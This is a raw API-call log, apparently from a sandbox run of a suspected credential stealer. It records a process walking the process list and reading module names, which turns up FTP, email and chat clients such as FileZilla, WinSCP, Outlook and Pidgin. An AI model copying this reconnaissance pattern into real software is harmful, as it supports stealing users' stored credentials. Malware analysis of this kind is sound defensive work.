0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0121.661] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0121.662] CloseHandle (hObject=0x0) returned 0 [0121.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a4 [0121.662] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0121.662] CloseHandle (hObject=0x5a4) returned 1 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a4 [0121.663] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0121.663] CloseHandle (hObject=0x5a4) returned 1 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0121.663] CloseHandle (hObject=0x0) returned 0 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0121.663] CloseHandle (hObject=0x0) returned 0 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0121.663] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0121.663] CloseHandle (hObject=0x5a4) returned 1 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5a4 [0121.663] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0121.663] CloseHandle (hObject=0x5a4) returned 1 [0121.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x5a4 [0121.663] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.665] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="dressing.exe") returned 0xc [0121.665] CloseHandle (hObject=0x5a4) returned 1 [0121.665] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x5a4 [0121.665] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.667] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x350000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="marathonruntimegrows.exe") returned 0x18 [0121.667] CloseHandle (hObject=0x5a4) returned 1 [0121.667] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x5a4 [0121.667] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.668] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1380000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="respondent savings.exe") returned 0x16 [0121.668] CloseHandle (hObject=0x5a4) returned 1 [0121.668] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5a4 [0121.668] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.670] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1290000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="agreed.exe") returned 0xa [0121.680] CloseHandle (hObject=0x5a4) returned 1 [0121.680] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5a4 [0121.680] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.682] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="accomplished environment.exe") returned 0x1c [0121.682] CloseHandle (hObject=0x5a4) returned 1 [0121.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x244) returned 0x5a4 [0121.682] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.683] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd30000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="safe.exe") returned 0x8 [0121.684] CloseHandle (hObject=0x5a4) returned 1 [0121.684] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x364) returned 0x5a4 [0121.684] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.685] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ri-get-abstracts.exe") returned 0x14 [0121.685] CloseHandle (hObject=0x5a4) returned 1 [0121.685] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x5a4 [0121.685] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.686] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="departurepmct.exe") returned 0x11 [0121.687] CloseHandle (hObject=0x5a4) returned 1 [0121.687] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x5a4 [0121.687] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.688] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xca0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ellis.exe") returned 0x9 [0121.688] CloseHandle (hObject=0x5a4) returned 1 [0121.688] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x5a4 [0121.688] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.689] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x910000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="infrared partial.exe") returned 0x14 [0121.690] CloseHandle (hObject=0x5a4) returned 1 [0121.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5a4 [0121.690] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.691] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1250000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="clusters_stainless_subsidiary.exe") returned 0x21 [0121.691] CloseHandle (hObject=0x5a4) returned 1 [0121.691] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x5a4 [0121.691] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.692] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1380000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="firefox-definition.exe") returned 0x16 [0121.692] CloseHandle (hObject=0x5a4) returned 1 [0121.693] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5a4 [0121.693] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.694] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x180000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="intensity-becoming.exe") returned 0x16 [0121.694] CloseHandle (hObject=0x5a4) returned 1 [0121.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x5a4 [0121.694] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.695] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1330000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="has.exe") returned 0x7 [0121.695] CloseHandle (hObject=0x5a4) returned 1 [0121.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x5a4 [0121.696] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.697] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd80000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="oorope.exe") returned 0xa [0121.697] CloseHandle (hObject=0x5a4) returned 1 [0121.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5a4 [0121.697] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.698] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1350000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="exchanges command.exe") returned 0x15 [0121.698] CloseHandle (hObject=0x5a4) returned 1 [0121.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x5a4 [0121.698] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.701] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="visual_minneapolis.exe") returned 0x16 [0121.701] CloseHandle (hObject=0x5a4) returned 1 [0121.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x5a4 [0121.701] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.702] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1270000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0121.703] CloseHandle (hObject=0x5a4) returned 1 [0121.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x5a4 [0121.703] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.704] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1020000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0121.704] CloseHandle (hObject=0x5a4) returned 1 [0121.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0121.704] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.705] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x140000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0121.706] CloseHandle (hObject=0x5a4) returned 1 [0121.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x5a4 [0121.706] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.707] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1290000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0121.707] CloseHandle (hObject=0x5a4) returned 1 [0121.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x5a4 [0121.707] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.709] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1190000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0121.709] CloseHandle (hObject=0x5a4) returned 1 [0121.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x5a4 [0121.709] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.710] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0121.710] CloseHandle (hObject=0x5a4) returned 1 [0121.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x600) returned 0x5a4 [0121.710] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.711] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0121.712] CloseHandle (hObject=0x5a4) returned 1 [0121.712] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5a4 [0121.712] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.713] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1190000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0121.713] CloseHandle (hObject=0x5a4) returned 1 [0121.713] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5a4 [0121.713] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.714] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0121.715] CloseHandle (hObject=0x5a4) returned 1 [0121.715] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5a4 [0121.715] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.716] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0121.716] CloseHandle (hObject=0x5a4) returned 1 [0121.716] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a4 [0121.716] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.717] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xda0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0121.718] CloseHandle (hObject=0x5a4) returned 1 [0121.718] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x524) returned 0x5a4 [0121.718] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.719] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x890000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0121.719] CloseHandle (hObject=0x5a4) returned 1 [0121.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x5a4 [0121.719] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.720] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0121.721] CloseHandle (hObject=0x5a4) returned 1 [0121.721] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x5a4 [0121.721] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.722] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf30000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0121.722] CloseHandle (hObject=0x5a4) returned 1 [0121.722] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x5a4 [0121.723] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.724] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1150000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0121.724] CloseHandle (hObject=0x5a4) returned 1 [0121.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x5a4 [0121.724] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.726] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xca0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0121.726] CloseHandle (hObject=0x5a4) returned 1 [0121.726] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x5a4 [0121.726] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.727] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x130000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0121.728] CloseHandle (hObject=0x5a4) returned 1 [0121.728] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5a4 [0121.728] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.729] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0121.729] CloseHandle (hObject=0x5a4) returned 1 [0121.729] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5a4 [0121.730] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.731] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa50000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0121.731] CloseHandle (hObject=0x5a4) returned 1 [0121.731] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5a4 [0121.731] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.732] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x13a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0121.733] CloseHandle (hObject=0x5a4) returned 1 [0121.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5a4 [0121.733] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.734] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe60000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0121.735] CloseHandle (hObject=0x5a4) returned 1 [0121.735] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5a4 [0121.735] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.736] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0121.736] CloseHandle (hObject=0x5a4) returned 1 [0121.736] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5a4 [0121.736] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.738] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0121.738] CloseHandle (hObject=0x5a4) returned 1 [0121.738] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5a4 [0121.738] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.739] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x240000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0121.740] CloseHandle (hObject=0x5a4) returned 1 [0121.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x880) returned 0x5a4 [0121.740] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.741] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x920000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0121.741] CloseHandle (hObject=0x5a4) returned 1 [0121.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5a4 [0121.741] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.742] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1070000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0121.743] CloseHandle (hObject=0x5a4) returned 1 [0121.743] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a0) returned 0x5a4 [0121.743] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.744] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1100000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0121.744] CloseHandle (hObject=0x5a4) returned 1 [0121.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5a4 [0121.744] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.745] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0121.745] CloseHandle (hObject=0x5a4) returned 1 [0121.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c0) returned 0x5a4 [0121.746] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.747] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2f0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0121.747] CloseHandle (hObject=0x5a4) returned 1 [0121.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x5a4 [0121.747] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.749] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0121.749] CloseHandle (hObject=0x5a4) returned 1 [0121.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x5a4 [0121.749] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 